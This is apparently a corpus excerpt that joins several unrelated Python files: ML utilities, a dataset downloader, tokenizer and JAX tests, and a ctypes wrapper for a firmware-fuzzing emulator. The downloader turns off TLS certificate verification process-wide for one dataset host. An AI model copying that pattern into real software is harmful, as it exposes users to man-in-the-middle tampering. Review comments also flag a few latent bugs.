        self.input_size = int(self.model.input_shape.Size())
        self.output_size = int(self.model.output_shape.Size())
        self.smoothing_items = []
        # Running totals for avg_time().
        self.total_time = 0
        self.count = 0

    def get_metadata(self, name):
        """Forward a metadata lookup to the wrapped model."""
        return self.model.get_metadata(name)

    def set_log(self, logfile):
        """ provide optional log file to write the raw un-smoothed predictions to """
        self.logfile = logfile

    def predict(self, feature_data):
        """ process the given feature_data using the classifier model, and smooth
        the output. It returns a tuple containing (prediction, probability, label, output),
        or (None, None, None, None) when nothing passes the threshold/ignore filters. """
        start_time = time.time()
        output = self.model.transform(feature_data)
        now = time.time()
        diff = now - start_time
        self.total_time += diff
        self.count += 1
        if self.logfile:
            # Raw (un-smoothed) outputs are logged as one CSV row per prediction.
            self.logfile.write("{}\n".format(",".join([str(x) for x in output])))
        if self.smoothing_window:
            output = self._smooth(output)
        prediction = self._get_prediction(output)
        if prediction is not None:
            label = ""
            if self.categories and prediction < len(self.categories):
                label = self.categories[prediction]
            if label not in self.ignore_list:
                return (prediction, output[prediction], label, output)
        return (None, None, None, None)

    def reset(self):
        """Reset the wrapped model's internal state."""
        self.model.reset()

    def clear_smoothing(self):
        # NOTE(review): this assigns [] to smoothing_window (a float elsewhere);
        # it looks like it was meant to clear smoothing_items — verify.
        self.smoothing_window = []

    def _get_prediction(self, output):
        """ handles scalar and vector predictions """
        if len(output) == 1:
            prediction = output[0]
        if np.isscalar(output):
            return 1 if output > self.threshold else None
        else:
            prediction = np.argmax(output)
        # NOTE(review): prediction is an index while ignore_list holds label
        # strings, so this membership test looks like it can never match — verify.
        if prediction in self.ignore_list:
            return None
        if output[prediction] > self.threshold:
            return prediction
        return None

    def _smooth(self, predictions):
        """ smooth the predictions over a given window size """
        self.smoothing_items += [predictions]  # add our new item
        # trim to our smoothing window size
        if len(self.smoothing_items) > self.smoothing_window:
            del self.smoothing_items[0]
        # compute summed probabilities over this new sliding window
        return np.mean(self.smoothing_items, axis=0)

    def avg_time(self):
        """ get the average prediction time """
        if self.count == 0:
            self.count = 1
        return self.total_time / self.count
| StarcoderdataPython |
177906 | #!/usr/bin/python
import sys
from collections import defaultdict
from collections import OrderedDict
# NOTE: Python 2 script (print statements, not functions).
print 'Begin to combine files:', ((sys.argv[1]).split('/'))[-1], ((sys.argv[2]).split('/'))[-1]
# Map: integer key from column 3 -> list of "1"/"0" flags in encounter order.
bo_dict = defaultdict(list)
fi = open(sys.argv[1], 'r') #wyb.imp
for line in fi:
    s = line.strip().split()
    #s[0] = '1'
    # Records from the first file (.imp) are tagged "1".
    o = "1"
    key = int(s[2])
    bo_dict[key].append(o)
fi.close()
fi = open(sys.argv[2], 'r') #wyb.lose
for line in fi:
    s = line.strip().split()
    #s[0] = '0'
    # Records from the second file (.lose) are tagged "0".
    o = "0"
    key = int(s[2])
    bo_dict[key].append(o)
fi.close()
# Sort by key so output rows are emitted in ascending key order.
bo_dict_sort = OrderedDict(sorted(bo_dict.items()))
fo = open(sys.argv[3], 'w')
for key in bo_dict_sort:
    line = ' '.join([str(key)] + bo_dict_sort[key])
    fo.write(line + '\n')
fo.close()
print 'Finished creating file:', ((sys.argv[3]).split('/'))[-1]
print '-------------------'
| StarcoderdataPython |
312394 | <gh_stars>0
import shutil
import urllib.request
import os
import hashlib
import sys
import zipfile
import json
import pprint
from os.path import dirname
from PIL import Image
from urllib.request import urlretrieve
from patoolib import extract_archive
from time import sleep
import requests
import ssl
import cv2
import requests
from io import BytesIO
from .models import DaclNet
import torch
# Pretty-printer shared by the list_* helpers below.
pp = pprint.PrettyPrinter(indent=4)
# Package directory; data files are resolved relative to it.
bikit_path = dirname(__file__)
# Registry of the real datasets, shipped as data/datasets.json.
with open(os.path.join(bikit_path, "data/datasets.json")) as f:
    DATASETS = json.load(f)
# Tiny archives used by the test/demo code paths instead of full datasets.
DEMO_DATASETS = {"test_zip": {"description": "",
                              "download_name": "test_zip",
                              "license": "",
                              "urls": ["https://github.com/phiyodr/building-inspection-toolkit/raw/master/bikit/data/test_zip.zip"],
                              "original_names": ["test_zip.zip"],
                              "checksums": ["63b3722e69dcf7e14c879411c1907dae"],
                              "sizes": ["0.2 MB"]},
                 "test_rar": {"description": "",
                              "download_name": "test_rar",
                              "license": "",
                              "urls": ["https://github.com/phiyodr/building-inspection-toolkit/raw/master/bikit/data/test_rar.rar"],
                              "original_names": ["test_rar.rar"],
                              "checksums": ["c020266280b076ff123294ae51af2b11"],
                              "sizes": ["3.7 MB"]}}
def pil_loader(path):
    """Load the image file at *path* and return it as an RGB PIL Image."""
    # Open through an explicit file handle to avoid a ResourceWarning
    # (https://github.com/python-pillow/Pillow/issues/835).
    with open(path, 'rb') as handle:
        image = Image.open(handle)
        return image.convert('RGB')
def cv2_loader(path):
    """Load the image at *path* with OpenCV and return it as an RGB numpy.ndarray."""
    # cv2.imread reads BGR and only accepts str, not pathlib.PosixPath.
    return cv2.cvtColor(cv2.imread(str(path)), cv2.COLOR_BGR2RGB)
def load_img_from_url(img_url):
    """Fetch *img_url* over HTTP and return the decoded PIL Image."""
    return Image.open(BytesIO(requests.get(img_url).content))
########## Model ##########
def list_models(verbose=True, cache_dir='~/.cache/bikit-models', force_redownload=False):
    """
    List all models available (docstring fixed: this lists models, not datasets).

    :param verbose: Print the model metadata to stdout
    :param cache_dir: Directory where metadata.json is cached
    :param force_redownload: Re-fetch metadata.json even if cached
    :return: Dictionary of model metadata keyed by model name
    """
    models_metadata = get_metadata(cache_dir, force_redownload)
    if verbose:
        pp.pprint(models_metadata)
    return models_metadata
def download_model(name, cache_dir='~/.cache/bikit-models', force_redownload=False):
    """Download the checkpoint for model *name* into *cache_dir*.

    Returns the local checkpoint path. The download is skipped when the file
    already exists, unless force_redownload is True.
    """
    models_metadata = get_metadata(cache_dir, force_redownload)
    all_model_names = list(models_metadata.keys())
    assert name in all_model_names, f"Please specify a valid model <name> out of {all_model_names}. You used {name}."
    base_url = "https://github.com/phiyodr/bikit-models/raw/master/models/"
    # Plain string concatenation: os.path.join would produce backslashes on Windows.
    model_url = base_url + models_metadata[name]["pth_name"]
    filename = os.path.join(os.path.expanduser(cache_dir), models_metadata[name]["pth_name"])
    if not os.path.isfile(filename) or force_redownload:
        print(f"Start to download {name}.")
        urlretrieve(model_url, filename)
        # Messages now report the actual path (the literal "(unknown)" was broken).
        print(f"Successfully downloaded model to {filename}.")
    else:
        print(f"Model {filename} already exists.")
    return filename
########## Metadata ##########
def download_metadata(cache_dir='~/.cache/bikit-models', force_redownload=False):
    """Download metadata.json from the bikit-models repository into *cache_dir*.

    Skipped when the file already exists, unless force_redownload is True.
    """
    cache_dir = os.path.expanduser(cache_dir)
    metadata_url = "https://github.com/phiyodr/bikit-models/raw/master/metadata.json"
    filename = os.path.join(cache_dir, "metadata.json")
    if not os.path.isfile(filename) or force_redownload:
        # exist_ok avoids a race between the isdir check and makedirs.
        os.makedirs(cache_dir, exist_ok=True)
        urlretrieve(metadata_url, filename)
        # Messages now report the actual path (the literal "(unknown)" was broken).
        print(f"Successfully downloaded metadata.json to {filename}.")
    else:
        print(f"metadata.json already exists at {filename}.")
def read_metadata(cache_dir='~/.cache/bikit-models'):
    """Load and return the cached metadata.json as a dict."""
    metadata_path = os.path.join(os.path.expanduser(cache_dir), "metadata.json")
    with open(metadata_path) as fh:
        return json.load(fh)
def get_metadata(cache_dir='~/.cache/bikit-models', force_redownload=False):
    """Return metadata.json as dict, downloading it first when needed."""
    filename = os.path.join(os.path.expanduser(cache_dir), "metadata.json")
    if force_redownload or not os.path.isfile(filename):
        download_metadata(cache_dir, force_redownload)
    return read_metadata(cache_dir)
def load_model(name, add_metadata=True, cache_dir="~/.cache/bikit-models", force_redownload=False):
    """Load a pretrained DaclNet by name, downloading the checkpoint if needed.

    :param name: Model name; must be a key of the model metadata.
    :param add_metadata: When True, also return the model's metadata entry.
    :param cache_dir: Directory where checkpoints and metadata are cached.
    :param force_redownload: Re-fetch model and metadata even if cached.
    :return: ``model`` or ``(model, metadata)`` depending on *add_metadata*.
    """
    models_metadata = get_metadata(cache_dir, force_redownload)
    all_model_names = list(models_metadata.keys())
    assert name in all_model_names, f"Please specify a valid model <name> out of {all_model_names}. You used {name}."
    model_path = os.path.join(os.path.expanduser(cache_dir), models_metadata[name]["pth_name"])
    if not os.path.isfile(model_path) or force_redownload:
        # Bug fix: forward the caller's cache_dir and force_redownload. The
        # previous code always downloaded into the default cache dir, so
        # model_path stayed missing when a custom cache_dir was used.
        download_model(name, cache_dir=cache_dir, force_redownload=force_redownload)
    # Checkpoints are loaded on CPU so this works on machines without a GPU.
    cp = torch.load(model_path, map_location=torch.device('cpu'))
    model = DaclNet(base_name=cp['base'],
                    resolution=cp['resolution'],
                    hidden_layers=cp['hidden_layers'],
                    drop_prob=cp['drop_prob'],
                    num_class=cp['num_class'])
    model.load_state_dict(cp['state_dict'])
    model.eval()  # inference mode by default
    if add_metadata:
        metadata = get_metadata(cache_dir, force_redownload)[name]
        return model, metadata
    else:
        return model
########## Datasets ##########
def list_datasets(verbose=True):
    """
    List all datasets available

    :param verbose: Print datasets
    :return: Return dictionary containing datasets name, url and original name.
    """
    available = DATASETS
    if verbose:
        pp.pprint(available)
    return available
def download_dataset(name, cache_dir='~/.cache/bikit', rm_zip_or_rar=False, force_redownload=False):
    """
    Download dataset if not on cache folder.

    :param name: Dataset name
    :param cache_dir: Cache directory
    :param rm_zip_or_rar: Delete the downloaded archive(s) after extraction.
    :param force_redownload: Remove any cached copy and download again.
    :return: None (0 for unsupported "meta" pseudo-datasets)
    """
    # "test" names come from a separate demo registry; "meta" datasets are
    # compositions of other datasets and cannot be downloaded directly.
    if "test" in name:
        datasets = DEMO_DATASETS
        print(datasets[name])
    elif "meta" in name:
        print("Please download the needed datasets manually: [download_dataset(name) for name in ['bcd', 'codebrim-classif-balanced', 'mcds_Bikit', 'sdnet_binary']]")
        return 0
    else:
        datasets = DATASETS
    assert name in list(
        datasets.keys()), f"Please specify a valid <name> out of {list(datasets.keys())}. You used {name}."
    cache_dir = os.path.expanduser(cache_dir)
    # Check if cache exist
    if not os.path.exists(cache_dir):
        os.makedirs(cache_dir)
        print(f"Create cache {cache_dir}")
    else:
        print(f"{cache_dir} already exists")
    # Set defaults
    data_dict = datasets[name]
    download_name = data_dict["download_name"]
    # codebrim archives unpack into an extra subdirectory.
    if name in ["codebrim-classif-balanced"]:
        cache_full_dir = os.path.join(cache_dir, download_name, "classification_dataset_balanced")
    #elif name == "codebrim-classif-balanced":
    #    cache_full_dir = os.path.join(cache_dir, download_name, "classification_dataset")
    else:
        cache_full_dir = os.path.join(cache_dir, download_name)
    # remove old Data for a clean new Download
    if force_redownload:
        if os.path.exists(cache_full_dir):
            shutil.rmtree(cache_full_dir)
            print(f"The Folder {cache_full_dir} has been removed.")
    # cache_zip = os.path.join(cache_full_dir, data_dict['original_name'])
    urls = data_dict['urls']
    sizes = data_dict['sizes']
    # Archive type is inferred from the first original file name ("zip"/"rar").
    file_type = data_dict['original_names'][0].split(".")[-1]
    checksums = data_dict['checksums']
    names = data_dict['original_names']
    #import pdb; pdb.set_trace()
    # Download if not available
    if not os.path.exists(cache_full_dir):
        print(f"Create folder {cache_full_dir}")
        os.makedirs(cache_full_dir)
        # Download
        # Some datasets consists of multiple files
        for idx, (url, file_name, checksum, size) in enumerate(zip(urls, names, checksums, sizes)):
            print(f"Start to download file {idx + 1} of {len(urls)} with {size}.")
            cache_zip = os.path.join(cache_full_dir, file_name)
            # Google-Drive-hosted datasets need the token/confirm dance.
            if name in ["codebrim-classif-balanced", "codebrim-classif", "sdnet_bikit", "sdnet_bikit_binary", "dacl1k"]:
                gdrive_download(total_size=size, download_id=url, full_cache_dir=cache_zip)
            else:
                if name == "sdnet":
                    # sdnet's host has an invalid TLS cert; skip verification.
                    ssl._create_default_https_context = ssl._create_unverified_context
                urllib.request.urlretrieve(url, filename=cache_zip, reporthook=_schedule)
            sleep(1)
            # Verify checksum
            if checksum:
                print("\nVerify checksum", end=" ")
                calculated_checksum = _md5(cache_zip)
                if calculated_checksum == checksum:
                    print("- checksum correct")
                else:
                    print(calculated_checksum, checksum)
                    print("- checksum wrong!")
            # Unzip/unrar
            if file_type == "zip":
                print("\nStart to unzip file", end=" ")
                with zipfile.ZipFile(cache_zip, 'r') as zip_ref:
                    # sdnet archives already contain the dataset folder, so
                    # extract one level above the cache_full_dir.
                    if name in ["sdnet_bikit", "sdnet_bikit_binary"]:
                        cache_full_dir = "/".join(cache_full_dir.split("/")[:-1])
                    zip_ref.extractall(cache_full_dir)
                print("- unzip done!")
            elif file_type == "rar":
                print("Start to unraring file", end=" ")
                try:
                    extract_archive(cache_zip, outdir=cache_full_dir)
                except Exception as e:
                    print("\n", e)
                    print("\nHave you installed rar? Try <apt install unrar>.")
                    raise
                print("- unrar done!")
            # Rm zip/rar file
            if rm_zip_or_rar:
                print(f"Removing {cache_zip}.")
                os.remove(cache_zip)
    else:
        print(f"{cache_dir} and {cache_full_dir} already exists.")
def _progressbar(cur, total=100):
"""Source: https://www.programmersought.com/article/14355722336/"""
percent = '{:.1%}'.format(cur / total)
sys.stdout.write('\r')
# sys.stdout.write("[%-50s] %s" % ('=' * int(math.floor(cur * 50 / total)),percent))
sys.stdout.write("Download data [%-100s] %s" % ('=' * int(cur), percent))
sys.stdout.flush()
def _schedule(blocknum, blocksize, totalsize):
    """urlretrieve report hook: convert block progress into a 0-100 bar.

    Source: https://www.programmersought.com/article/14355722336/
    blocknum: currently downloaded block
    blocksize: block size for each transfer
    totalsize: total size of web page files
    """
    if totalsize == 0:
        fraction = 0
    else:
        # Clamp at 100% — the last block usually overshoots the total size.
        fraction = min(blocknum * blocksize / totalsize, 1.0)
    _progressbar(fraction * 100)
def _md5(filename):
# Source: https://stackoverflow.com/a/3431838
hash_md5 = hashlib.md5()
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def gdrive_download(total_size, download_id, full_cache_dir=""):
    """
    Download a dataset archive from Google Drive.

    :param total_size: human-readable file size string from the json file (e.g. "2.3 GB")
    :param download_id: Google Drive file id to download
    :param full_cache_dir: destination file path for the archive
    """
    url = "https://docs.google.com/uc?export=download"
    # download the Zip file
    session = requests.Session()
    # First request: for large files Google answers with a virus-scan warning
    # page instead of the payload; the confirm token arrives via cookie.
    response = session.get(url, params={'id': download_id}, stream=True)
    token = _get_confirm_token(response)
    if token:
        # Second request with the confirm token streams the actual file.
        params = {'id': download_id, 'confirm': token}
        response = session.get(url, params=params, stream=True)
        _save_response_content(response=response, destination=full_cache_dir, totalsize=total_size)
        print(f"{full_cache_dir} is done")
    else:
        raise Exception("There was an Error while getting the download token!"
                        " This may occur when trying to download to often in a short time period."
                        " Please try again later!")
def _get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
def _save_response_content(response, destination, totalsize):
    """Stream *response* to *destination*, drawing a progress bar.

    :param response: Streaming requests response.
    :param destination: Output file path.
    :param totalsize: Human-readable size string such as "2.3 GB".
    """
    chunk_size = 32768
    # Hoisted out of the loop: previously this string parse ran once per chunk.
    # NOTE(review): assumes the size string is expressed in GB — confirm for
    # datasets smaller than 1 GB.
    filesize = float(totalsize.split(" ")[0]) * 1073741824
    counter = 0
    with open(destination, "wb") as f:
        for chunk in response.iter_content(chunk_size):
            if chunk:
                f.write(chunk)
                counter += 1
                _schedule(blocknum=counter, blocksize=chunk_size, totalsize=filesize)
    sys.stdout.write(f"\n{round((chunk_size * counter) / 1073741824, 2)} GB Downloaded. Download finished.\n", )
if __name__ == "__main__":
    # Smoke test: download the dacl1k dataset and iterate one sample.
    name = "dacl1k"
    download_dataset(name)
    from bikit.datasets import BikitDataset  # Deprecated: from bikit.datasets.data import BikitDataset
    from torch.utils.data import DataLoader
    from torchvision import transforms
    my_transform = transforms.Compose([transforms.Resize((256, 256)), transforms.ToTensor()])
    train_dataset = BikitDataset(name, split="train", transform=my_transform, return_type="pt")
    train_loader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=False, num_workers=0)
    # Use it in your training loop
    for i, (imgs, labels) in enumerate(train_dataset):
        print(i, imgs.shape, labels.shape)
        break
    # Optional extra checks, disabled by default.
    test_data, test_meta = False, False
    if test_data:
        name = "codebrim-classif"
        #download_dataset(name, rm_zip_or_rar=True, force_redownload=False)
        print("===Download done===")
        from bikit.datasets import BikitDataset
        from torch.utils.data import DataLoader
        from torchvision import transforms
        my_transform = transforms.Compose([transforms.Resize((256, 256)), transforms.ToTensor()])
        trainval_dataset = BikitDataset(name, split="test", transform=my_transform)
        trainval_loader = DataLoader(dataset=trainval_dataset, batch_size=64, shuffle=False, num_workers=0)
        # Use it in your training loop
        for i, (imgs, labels) in enumerate(trainval_loader):
            print(i, imgs.shape, labels.shape, labels)
            if i > 1:
                break
        print("===Done===")
    elif test_meta:
        download_metadata()
3542623 | # coding: utf-8
from __future__ import unicode_literals
import pytest
@pytest.mark.parametrize('text',
                         ["ق.م", "إلخ", "ص.ب", "ت."])
def test_ar_tokenizer_handles_abbr(ar_tokenizer, text):
    # Each Arabic abbreviation must survive tokenization as a single token.
    doc = ar_tokenizer(text)
    assert len(doc) == 1
def test_ar_tokenizer_handles_exc_in_text(ar_tokenizer):
    # Checks that the abbreviation "ق.م" (BC) stays a single token and is
    # lemmatized to the full form.
    # NOTE(review): a second function with this exact name is defined below,
    # so pytest only collects the later one and never runs this test.
    text = u"تعود الكتابة الهيروغليفية إلى سنة 3200 ق.م"
    tokens = ar_tokenizer(text)
    assert len(tokens) == 7
    assert tokens[6].text == "ق.م"
    assert tokens[6].lemma_ == "قبل الميلاد"
def test_ar_tokenizer_handles_suffix_in_text(ar_tokenizer):
    """Tokenize a sentence with a unit suffix ("14كم") attached to a number.

    Renamed: this function previously reused the name
    test_ar_tokenizer_handles_exc_in_text, shadowing the earlier test of the
    same name so that one was never collected by pytest. The stray debug
    print was removed as well.
    """
    text = u"يبلغ طول مضيق طارق 14كم "
    tokens = ar_tokenizer(text)
    assert len(tokens) == 6
| StarcoderdataPython |
3207181 | import vel.util.intepolate as interpolate
from vel.api.base import Schedule
class LinearSchedule(Schedule):
    """Schedule that moves a value linearly from an initial to a final setting."""

    def __init__(self, initial_value, final_value):
        self.initial_value = initial_value
        self.final_value = final_value

    def value(self, progress_indicator):
        """Return the linear interpolation at *progress_indicator* (0..1)."""
        return interpolate.interpolate_linear_single(
            self.initial_value, self.final_value, progress_indicator)
def create(initial_value, final_value):
    """Vel creation function: build a LinearSchedule from the two endpoints."""
    return LinearSchedule(initial_value=initial_value, final_value=final_value)
| StarcoderdataPython |
4837961 | import re
n = int(input())
regex = '[?+-]*\d?\.\d+'
for x in range(n):
num = input()
m = re.search(regex, num)
if m:
try:
f = float(num)
print(True)
except:
print(False)
else:
print(False)
| StarcoderdataPython |
358493 | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax.config import config
import jax._src.distributed as distributed
import jax._src.lib
from jax._src import test_util as jtu
# portpicker is an optional, test-only dependency; the tests below are
# skipped when it is unavailable.
try:
    import portpicker
except ImportError:
    portpicker = None

# Let absl parse JAX's command-line flags for the test runner.
config.parse_flags_with_absl()
@unittest.skipIf(jax._src.lib.xla_extension_version < 73,
                 "Test requires jaxlib 0.3.12 or newer.")
@unittest.skipIf(not portpicker, "Test requires portpicker")
class DistributedTest(jtu.JaxTestCase):
    """Tests for jax.distributed initialization and shutdown."""

    def testInitializeAndShutdown(self):
        # Tests the public APIs. Since they use global state, we cannot use
        # concurrency to simulate multiple tasks.
        port = portpicker.pick_unused_port()
        jax.distributed.initialize(coordinator_address=f"localhost:{port}",
                                   num_processes=1,
                                   process_id=0)
        jax.distributed.shutdown()

    @parameterized.parameters([1, 2, 4])
    def testConcurrentInitializeAndShutdown(self, n):
        # Simulate n tasks joining the same coordinator from one process,
        # each with its own State instance.
        port = portpicker.pick_unused_port()

        def task(i):
            # We can't call the public APIs directly because they use global state.
            state = distributed.State()
            state.initialize(coordinator_address=f"localhost:{port}",
                             num_processes=n,
                             process_id=i)
            state.shutdown()

        threads = [threading.Thread(target=task, args=(i,)) for i in range(n)]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
if __name__ == "__main__":
    # Run through absl so JAX's test flags are honored.
    absltest.main(testLoader=jtu.JaxTestLoader())
| StarcoderdataPython |
1942191 | """Handlers for oauth."""
from fastapi_aad_auth.oauth.aad import AADOAuthBackend # noqa F401
from fastapi_aad_auth.oauth.state import AuthenticationState # noqa F401 | StarcoderdataPython |
6427091 | import ctypes
import os
import sys
import logging
from . import timer
from .exit import has_exit_hooks, invoke_exit_callbacks
from .globs import (DEFAULT_BASIC_BLOCK_LIMIT,
DEFAULT_FUZZ_CONSUMPTION_TIMEOUT, DEFAULT_MAX_INTERRUPTS,
FUZZ_MODES, TRIGGER_MODES)
from .mmio_models.wrapper import mmio_access_handler_wrapper_hook
logger = logging.getLogger("emulator")
""" native.py
Wrapper around the native library API functions.
"""
# Handle to the loaded native shared library (set by load_native_lib).
native_lib = None
# C-callable wrapper that dispatches MMIO accesses to the Python handler.
mmio_cb_wrapper = None
# C-callable wrapper and its user-data pointer for native timer callbacks.
timer_cb_wrapper = None
timer_cb_user_data = None

# just like unicorn does we need to keep references to ctype cb objects
obj_refs = []

# Opaque uc_engine* handle type used in all native prototypes.
uc_engine = ctypes.c_void_p

# Prototyping code taken from unicorn python bindings
def _load_lib(path):
    """Load the native shared library at *path*; return None on failure."""
    lib_file = os.path.join(path)
    try:
        return ctypes.cdll.LoadLibrary(lib_file)
    except OSError as e:
        logger.error(f'FAILED to load {lib_file} {e}')
        return None
# setup all the function prototype
def _setup_prototype(lib, fname, restype, *argtypes):
getattr(lib, fname).restype = restype
getattr(lib, fname).argtypes = argtypes
# void (*exit_hook_t)(int status, int kill_signal)
EXIT_CB = ctypes.CFUNCTYPE(
    None, ctypes.c_int, ctypes.c_int
)

# unicorn UC_HOOK_CODE callback: (uc, address, size, user_data)
UC_HOOK_CODE_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p
)

# unicorn UC_HOOK_MEM callback: (uc, access_type, address, size, value, user_data)
UC_HOOK_MEM_ACCESS_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_int,
    ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p
)

# unicorn UC_HOOK_INTR callback: (uc, interrupt_number, user_data)
UC_HOOK_INTR_CB = ctypes.CFUNCTYPE(
    None, uc_engine, ctypes.c_uint32, ctypes.c_void_p
)

# user_data pointer shared by all default MMIO regions (set lazily).
mmio_user_data = None
def add_mmio_region(uc, start, end):
    """Register [start, end] as a fuzz-served MMIO region with the native lib."""
    global mmio_user_data
    if mmio_user_data is None:
        # Reuse unicorn's callback bookkeeping: the current callback count is
        # used as the user_data key for the default MMIO handler.
        mmio_user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
    assert native_lib.add_mmio_region(uc._uch, start, end, mmio_user_data) == 0
def load_fuzz(file_path):
    """Hand the fuzz input file at *file_path* to the native library."""
    status = native_lib.load_fuzz(file_path.encode())
    assert status == 0
    sys.stdout.flush()
def emulate(uc, fuzz_file_path, prefix_input_file_path=None):
    """Run native emulation with the given fuzz input (and optional prefix input).

    C side: uc_err emulate(uc_engine *uc, char *input_path, uint64_t instr_limit, char *prefix_input_path);
    """
    # The native side expects NULL when no prefix input is used; this also
    # normalizes an empty string to NULL.
    prefix_arg = prefix_input_file_path.encode() if prefix_input_file_path else None
    native_lib.emulate(uc._uch, fuzz_file_path.encode(), prefix_arg)
def get_fuzz(uc, size):
    # Copy *size* bytes of raw fuzz input out of the native buffer.
    # NOTE(review): unlike most wrappers this passes `uc` rather than
    # `uc._uch` — confirm callers supply the raw engine handle here.
    ptr = (ctypes.c_char * size).from_address(native_lib.get_fuzz_ptr(uc, size))
    return ptr.raw

def fuzz_consumed():
    # Number of fuzz input bytes consumed so far.
    return native_lib.fuzz_consumed()

def fuzz_remaining():
    # Number of fuzz input bytes still unconsumed.
    return native_lib.fuzz_remaining()

def get_latest_mmio_fuzz_access_size():
    # Size in bytes of the most recent fuzz-fed MMIO access.
    return native_lib.get_latest_mmio_fuzz_access_size()

def get_latest_mmio_fuzz_access_index():
    # Offset into the fuzz buffer of the most recent fuzz-fed MMIO access.
    return native_lib.get_latest_mmio_fuzz_access_index()
def register_cond_py_handler_hook(uc, handler_locs):
    """Install the native conditional code hook for the given handler addresses."""
    if not handler_locs:
        logger.warning("no function handler hooks registered, skipping registration")
        return
    arr = (ctypes.c_int64 * len(handler_locs))(*handler_locs)
    # hack: In order to keep a uc reference around for the high level callback,
    # we sneak an additional callback into the uc object (as done in unicorn.py)
    from .user_hooks import func_hook_handler
    callback = func_hook_handler
    uc._callback_count += 1
    uc._callbacks[uc._callback_count] = (callback, None)
    cb = ctypes.cast(UC_HOOK_CODE_CB(uc._hookcode_cb), UC_HOOK_CODE_CB)
    user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
    assert native_lib.register_cond_py_handler_hook(
        uc._uch, cb, arr, len(arr), user_data
    ) == 0
    # Keep the C callable alive — otherwise it gets garbage collected while
    # the native side still holds a pointer to it.
    obj_refs.append(cb)
def remove_function_handler_hook_address(uc, address):
    """Drop the native function-handler hook registered at *address*."""
    status = native_lib.remove_function_handler_hook_address(uc._uch, address)
    assert status == 0
def _create_and_inject_c_callable_mem_hook(uc, py_fn):
    """Wrap *py_fn* as a C-callable memory-access hook; return (cb, user_data)."""
    # hack: In order to keep a uc reference around for the high level callback,
    # we sneak an additional callback into the uc object (as done in unicorn.py)
    callback = py_fn
    uc._callback_count += 1
    uc._callbacks[uc._callback_count] = (callback, None)
    cb = ctypes.cast(UC_HOOK_MEM_ACCESS_CB(uc._hook_mem_access_cb), UC_HOOK_MEM_ACCESS_CB)
    user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
    # Keep the C callable alive for the native side.
    obj_refs.append(cb)
    return cb, user_data

def _create_and_inject_c_callable_central_timer_hook(uc, py_fn):
    """Wrap *py_fn* as a C-callable timer callback; return (cb, user_data)."""
    callback = py_fn
    # hack: In order to keep a uc reference around for the high level callback,
    # we sneak an additional callback into the uc object (as done in unicorn.py)
    # even bigger hack: we re-use the prototype of interrupt callbacks for the fact of their function prototype
    # to create an alternative callback
    # from: cb(self, intno, data)
    # to  : cb(self, timer_id, data)
    uc._callback_count += 1
    uc._callbacks[uc._callback_count] = (callback, None)
    cb = ctypes.cast(UC_HOOK_INTR_CB(uc._hook_intr_cb), UC_HOOK_INTR_CB)
    user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
    obj_refs.append(cb)
    return cb, user_data
def register_py_handled_mmio_ranges(uc, python_handled_range_starts, python_handled_range_ends):
    """Route MMIO accesses in the given ranges to the Python-side handler."""
    global mmio_cb_wrapper
    assert mmio_cb_wrapper is not None
    assert len(python_handled_range_starts) == len(python_handled_range_ends)
    starts_arr = (ctypes.c_int64 * len(python_handled_range_starts))(*python_handled_range_starts)
    ends_arr = (ctypes.c_int64 * len(python_handled_range_ends))(*python_handled_range_ends)
    assert native_lib.register_py_handled_mmio_ranges(uc._uch, mmio_cb_wrapper, starts_arr, ends_arr, len(python_handled_range_ends)) == 0

def register_linear_mmio_models(uc, starts, ends, pcs, init_vals, steps):
    """Register MMIO ranges modeled as linearly increasing counters."""
    assert len(starts) == len(ends) == len(init_vals) == len(steps)
    starts_arr = (ctypes.c_int64 * len(starts))(*starts)
    ends_arr = (ctypes.c_int64 * len(ends))(*ends)
    init_vals_arr = (ctypes.c_int32 * len(init_vals))(*init_vals)
    steps_arr = (ctypes.c_int32 * len(steps))(*steps)
    pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
    assert native_lib.register_linear_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, init_vals_arr, steps_arr, len(starts)) == 0

def register_constant_mmio_models(uc, starts, ends, pcs, vals):
    """Register MMIO ranges that always read back a constant value."""
    assert len(starts) == len(ends) == len(vals) == len(pcs)
    starts_arr = (ctypes.c_int64 * len(starts))(*starts)
    ends_arr = (ctypes.c_int64 * len(ends))(*ends)
    vals_arr = (ctypes.c_int32 * len(vals))(*vals)
    pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
    assert native_lib.register_constant_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, vals_arr, len(starts)) == 0

def register_bitextract_mmio_models(uc, starts, ends, pcs, byte_sizes, left_shifts, masks):
    """Register MMIO ranges served by masked/shifted slices of fuzz input."""
    assert len(starts) == len(ends) == len(byte_sizes) == len(left_shifts) == len(pcs)
    starts_arr = (ctypes.c_int64 * len(starts))(*starts)
    ends_arr = (ctypes.c_int64 * len(ends))(*ends)
    byte_sizes_arr = (ctypes.c_int8 * len(byte_sizes))(*byte_sizes)
    left_shifts_arr = (ctypes.c_int8 * len(left_shifts))(*left_shifts)
    masks_arr = (ctypes.c_int32 * len(masks))(*masks)
    pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
    assert native_lib.register_bitextract_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, byte_sizes_arr, left_shifts_arr, masks_arr, len(starts)) == 0

